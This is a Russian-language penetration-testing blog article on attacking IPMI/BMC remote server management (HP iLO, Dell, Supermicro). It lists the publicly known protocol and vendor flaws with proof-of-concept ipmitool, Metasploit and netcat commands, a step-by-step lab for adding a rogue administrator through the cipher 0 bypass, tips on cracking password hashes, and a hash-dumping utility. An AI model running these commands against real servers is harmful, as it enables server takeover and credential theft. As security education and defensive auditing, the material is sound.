Атака на IPMI/BMC (KVM over IP) системы.

    Абсолютное большинство современных серверов имею IPMI/BMC интерфейс для управления сервером удаленно. Данный инструмент представляет собой доступ к виртуальной клавиатуре и экрану сервера посредством протокола TCP/IP. Сегодня мы коснемся истории исследования безопасности IPMI, рассмотрим векторы для проведения атак и их дальнейшего развития с использованием IPMI.

IPMA

    IPMI — это набор спецификаций, регламентирующих, как общаться и что предоставлять.
Все вендоры стараются придерживаться этих спецификаций.
ВМС — это обертка из железа для работы IPMI. Представляет собой одноплатный компьютер (system on а chip) с щупальцами в сенсорах основного. Каждый вендор сам выбирает, что за железо использовать и как его объединять, что естественно. Все наши примеры мы будем рассматривать на lntegrated Lights Out (iLO) от Hewlett-Packard (НР). НР iLO — это какраз связка BMC/IPMI. У других вендоров свои названия, реализации в железе и софте. Но, как правило, это одноплатный компьютер с процессором ARM и Linux на борту.
Основная функция подобных устройств — сделать жизнь админов более простой и удобной : пропадает необходимость бежать к серверу и жать кнопку Reset /ставить новую систему/ смотреть, почему он не грузится. Теперь можно подключиться к IPMl/BMC и сделать все это удаленно. К тому же появляется возможность получать информацию со всевозможных датчиков температуры,
напряжения и так далее, что также довольно удобно.

Вендоры IPMI
Вендоры IPMI

УПРАВЛЕНИЕ

Интерфейсов управления несколько :
— веб — интерфейс (зависит от вендора) ;
— IPMI over LAN (UDP 623);
— из установленной системы на сервере (при условии , что установлены драйверы от производителя). Используемый софт : WMI под виндой, OpenlPMI, IPMltool под Linux.

С веб-интерфейсом все понятно. Каждый вендор сам решает, как он выглядит и как его реализовать. Второй и третий интерфейсы похожи, но различается среда передачи. В случае IPMI over LAN, как можно догадаться, команды передаются через сеть на порт UDP 623. Из установленной системы команды для IPMI передаются посредством файла устройства, обычно это /dev/ipm iO, которое появляется после установки драйвера. Стандартная утилита для взаимодействия с IPMI — это IPMltool под GNU/Linux, как наиболее простая в обращении.

ЧТО ПЕНТЕСТЕРУ IPMl/BMC

Несмотря на то что отчет об уязвимостях IPMl/BMC был опубликован еще летом 2013 года, в настоящее время остается очень много уязвимых систем. Очень часто IPMl/BMC любой масти можно найти через поисковик shodanhq.соm. Естественно, не стоит держать подобные системы снаружи. В основном они встречаются при проведении внутренних пентестов. Один из самых простых векторов развития атаки с использованием таких систем — «угон» сервера с помощью IPMI/BMC.

    Заимев административный доступ к IPMl/BMC (как будет показано далее, это совсем несложно), можно подключиться через VirtualConsole (aka KVM) и, к примеру, сбросить пароль root’a или с помощью LiveCD сдампить хеш и локальных пользователей, если это Windows. При прокачанном скилле удачи можно даже поймать консоль, из которой root забыл разлогиниться (очень часто такое встречается на виртуальных машинах). В свою очередь, IPMI можно использовать и как возможность вернуть доступ к серверу после полной переустановки системы.
Доступ к IPMI/ВМС средствами операционной системы при наличии максимальных привилегий возможен без использования пароля, то есть авторизация вообще не нужна. В этом случае злоумышленник просто создает административный аккаунтов IPMl/BMC. При потере доступа к серверу он заходит на IPMl/BMC и возвращает честно заработанное добро. Вообще, связь IPMl/BMC с основным компьютером до сих пор досконально не изучена. Это непаханое поле для поиска багов и фич. Учитывая количество вендоров, которые реализуют это в своих серверах, можно говорить о «богатом внутреннем мире».

ПУБЛИЧНЫЕ ИССЛЕДОВАНИЯ

Впервые на безопасность IPMI и ВМС обратил внимание Дэн Фармер (DanFarmer). С его полным отчетом, носящим говорящее название «Грузовой поезд в ад». Мы рассмотрим наиболее интересные с точки зрения взлома моменты.
Руководствуясь исследованием Дэна, уязвимости IPMl/BMC можно разделить на две большие категории:

· кастомные баги от производителей (например , уязвимости веб-интерфейса);
· уязвимости протокола IPMI.

На самом деле Дэн накопал много интересного, об этом ниже.

NULL authentication

Описание
Уязвимость позволяет обойти аутентификацию. Присутствует только в IPMI 1.5. Эксплуатация дает возможность управлять устройством, просто активировав опцию отключения аутентификации. Привилегии различаются у разных вендоров, но обычно бывают максимальными.

Вендоры
— НР
— Dell
— Supermicro.

Условия
Открытый порт UDP 623, IPMI 1.5, логин существующего юзера.

POC

ipmtiool -А NONE -Н targetIP bmc guid

 IPMI Authentication Bypass via Cipher 0

Описание
Уязвимость позволяет обойти аутентификацию. Бага появилась с IPM I верси ей
2.0. В этой ревизии решили добавить шифрования. Для эксплуатации надо
знать логин валидной учетной записи, а вот пароль знать не обязательно —
можно указать любой.

Вендоры
— НР
— Dell
— Supermicro.

Условия

Открытый порт UDP 623, IPMI 2.0, логин существующего юзера.

Рос

metasploit - auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -Н targetIP -u
Administrator -Р anypasswordhere user list

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

Описание
Уязвимость позволяет неавторизированному юзеру получить захешированные пароли пользователей для последующего брута. Бага появилась в спецификации IPMI версии 2.0

Вендоры
— НР
— Dell;
— Supermicro.

УСЛОВИЯ

Открытый порт UDP 623, IPMI 2.0 и валидные user-logins.

Рос

metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes
http://fish2.com/ipmi/tools/rak-the-ripper.pl

IPMI Anonymous Authentication / Null user

Описание
Кто-то называет это null user, кто-то — anonymous authentication. Кто-то разделяет эти две уязвимости, кто-то нет. По умолчанию существует null user / anonymous — «» (пустая строка). Если говорят null user, то пароль у него тоже пустой. Если говорят anonymous authentication, то пасс у него admin и во всем виновато IPMI Chips with ATEN-Software.
Дэн в своем исследовании считает это как две разные уязвимости. А в доке от Rapid7 об null user уже ни слова .

Вендоры:

• НР
• Dell
• Supermicro (используют IPMI Chips with ATEN-Software).

Условия

Открытый порт UDP 623.

Рос

metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes
ipmitool -I lanplus -Н targetIP -U '' -Р '' user list

 Supermicro IPMI UPnP Vulnerabllity

Описание
В Supermicro присутствует сервис UPnP SSDP на порту UDP 1900. Он уязвим к переполнению буфера.

Вендоры
• Supermicro.

Условия
Открытый порт 1900.

Рос

metasploit exploit/multi/upnp/libupnp _ssdp_overflow
metasploit auxiliary/scanner/upnp/ssdp_msearch

 Supermicro IPMI Clear-text Passwords

Описание
Спецификация IPMI 2.0 подразумевает, что где-то должны храниться пароли в открытом виде. В Supermicro они находятся в файлах /nv/PSBlock или /nv/PSStore, в зависимости от firmware.
Помимо этого, в реализациях ВМС на Nuvoton WPCM450 на ТСР-порту 49152 висит сервис, который позволяет читать содержимое файлов в директории /nv, например PSBlock, server.pem и так далее.

Вендоры
· Supermicro.

Условия
Shell-дocтyп

Рос

cat /nv/PSBlock
echo (GET /PSBlock' 1 nc targetIP 49152

По поводу уязвимостей «NULL authentication / IPMI Authentication Bypass via Cipher О», «IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval», «IPMI Anonymous Authentication» — обо всем этом написано в спецификации IPMI.
Исследователи досконально изучили ее, сделав при этом упор на механизмы аутентификации и шифрования. Уязвимость, связанная с произвольным выполнением кода в UРnР-сервисе в прошивке Supermicro (Supermicro IPMI UPnP Vulnerability), относится к CVE-2012-5958 (BoF в libupnp). Остальные же затронутые нами уязвимости найдены с помощью анализа прошивки Supermicro для материнских плат Supermicro Х9, причем упор делался именно на анализ кода, отвечающего за веб.

HANDS-ON LAB

Давай разберем стандартную схему эксплуатирования уязвимостей IPMI.
С помощью модуля ipmi_version, доступного в известном фреймворке Metasploit, можно просканировать периметр сети. Если ты уже находишься во внутреннем сегменте и устанавливать/использовать Metasploit нет возможности, то можно обойтись простенькой утилитой ipmiping или rmcpping.
Как только удалось обнаружить открытые IPMI, в первую очередь следует проверить их на уязвимость «Authentication Bypass via Cipher О» (смотри выше). Если она присутствует, то можно обойтись без дампа хешей пользо вателей и просто сбросить пароль администратору или добавить своего. Важно: для использования этой уязвимости необходимо знание логи на учетной записи, в нашем случае у учетной записи должны присутствовать административные привилегии. Для начала рассмотрим случай с дампом хеша пользователя и посл едующим его брутфорсом.

С помощью модуля Metasploit’a ipmi_dumphashes мы имеем возможность собрать хеши пользователей. Важно: без знания логина пользователя не получится добыть его хеш. В опциях ipmi_dumphashes можно указать путь до файла с логинами, например в том случае, если админы создали для себя учетные записи. Файл, который используется по умолчанию, содержит дефолтные логины всех вендоров. Брут хешей поддерживают как oclHashcat, так и John the Ripper с jumbо-патчами (community edition). Джона следует брать с гитхаба, так как на официальном сайте устаревшая версия без поддержки нужного нам формата. Последняя версия oclHashcat, на данный момент 1.30, поддерживает все из коробки.

    Если у тебя в руках оказался хеш от НР ilO4, то тебе повезло. Дело в том, что при конфигурировании на заводе пароль по умолчанию для учетной записи Administrator устанавливают длиной восемь символов — uppercase + numeric. На моих скромных мощностях поиск подобного значения занимает около получаса.

     В случае наличия уязвимости cipher О можно обойтись без брутфорса хешей и сбросить пароль. Для этого нам понадобится утили та IPMitool. Сборка под GNU/Linux не вызывает вопросов . А вот под Windows придется устроить пляски с бубном в Cygwin. Последовательност ь действий для добавленияадминистратора такая:

1. Смотрим, какие пользователи присутствуют, и используем следующий свободный ID.

ipmitool -I lanplus -с 0 -H 1.1.1.1 -U
Administrator -Р anypasswordhere user list

 2. Устанавливаем логин нашего пользователя .

ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Administrator
-P anypasswordhere user set name <ID> hacкer

 3. Задаем для него пароль .

ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Administrator -P
anypasswordhere user set password <ID> hackerpass

 4. Делаем его администратором.

ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U
Administrator -Р anypasswordhere user priv <ID> 4

 5. Активируем толь ко что созданную учетную запись .

ipmitool -I lanplus -C 0 -H 1.1.1.1 -U
Administrator -Р anypasswordhere user еnаble <ID>

     После того как хеши взломаны, пароли сброшены или же добавлен новый администратор, у тебя появляется возможность зайти через веб-интерфейс, по SSH на SMASH или подключиться к удаленному рабочему столу, а -ля KVM.
Особую ценность представляет переключатель KVM, так как реализует доступ непосредственно к самой консоли, тем самым позволяя получить доступ в BIOS, установить операционную систему и тому подобное. За реализацию переключателя KVM отвечает каждый вендор сам. Например, в НР
ilO4 для этого используются порты ТСР 17988 и 17990. У Dell iDRAC7 это порт ТСР 5900. Cisco ICM порт ТСР 2068.

Стоит упомянут ь такую вещь, как НР BladeSystem Onboard Administrator. НР BladeSystem представляет собой шасси, к которому подключаются блейд-серверы. Так вот, это шасси позволяет управлять централизованно блейд-серверами с помощью IPMI. При этом авторизация на «Подчиннные» IPMI происходит с помощью механизма SSO. Все, что тебе требуется , — это получить хеш пользователя с административными привилегиями и с помощью веб-интерфейса подключиться на интересующий тебя сервер.

Еще одна интересная особенность, найденная в НР il04, — это возможность подключиться к серверу по KVM прямо из SMASH (читай : SSH) с помощью команды TEXTCONS. Это весьма полезно, когда закрыты порты 80, 443, 17990. Для этого понадобятся права администратора, но какая разница?
Стать администратором не так сложно. Персонально для тебя, читатель, я подготовил программу ipmicd на С под Windows/Linux. Она позволяет сканировать диапазон адресов на наличие IPMl/BMC, а также дампит хеши (аналог ipmi_dumphashes из Metasploit’a). Программы созданы на тот случай, когда использовать Metasploit не самая удачная идея, например IPMl/BMC находятся где-то далеко , куда Metasploit не пробросишь .

Утилита доступна на GitHub. Очень проста в использовании:

1. Параметр -р используется, когда необходимо провести сканирование определенного диапазона.
2. Параметр -d указывает необходимость получить захешированный пароль .
3. Параметр -v N указывает степень логирования при работе 0..5. При N = 1 программа выдает фингерпринты.

Комбинируя различные параметры, можно влиять на поведение программы. Например, при использовании вместе опций -d и -р программа будет пробовать получить хеши только с тех систем, которые отвечают на IРМl- пинги. При использовании только опции -d будет пытаться получить хеши со всех адресов, что обычно происходит нереально медленно. Если что-то вызывает сомнения, то можно использовать опцию -v 5 — программа будет выводить в удобном формате получаемые сообщения. Для компилирования под Linux понадобится тол ько GCC — gcc ipmicd.c -static -о ipmicd. В случае использования на Windows компилировать следует с помощью MinGW gcc ipmicd.c -mno-ms-bitfields -lws2_32 -DMINGW.

ЗАКЛЮЧЕНИЕ

Пара слов о высоком: изучение возможностей и реализаций разными вендорами IPMl/BMC только начинается. Сюда можно включить не только веб -интерфейсили SMASH, но и драйверы для операционных систем, позволяющие взаимодействовать с технологиями удаленного управления сервером IPMI/ВМС из установленной системы. Внутренние сервисы, реализующие обмен информацией в IPMl/BMC. Под прицел может попасть даже «железная» реализация самого ВМС и как именно он управляет основным сервером. Администраторам же я рекомендую проверить все свои системы на наличие в них публичных уязвимостей и по возможности устранить эти уязвимости. Самая же главная рекомендация, которую я бы хотел дать читателем — уделяйте максимум внимания настройкам оборудования которым вы управляете.

Специалист в области кибер-безопасности. Работал в ведущих компаниях занимающихся защитой и аналитикой компьютерных угроз. Цель данного блога - простым языком рассказать о сложных моментах защиты IT инфраструктур и сетей.

Leave a reply:

Your email address will not be published.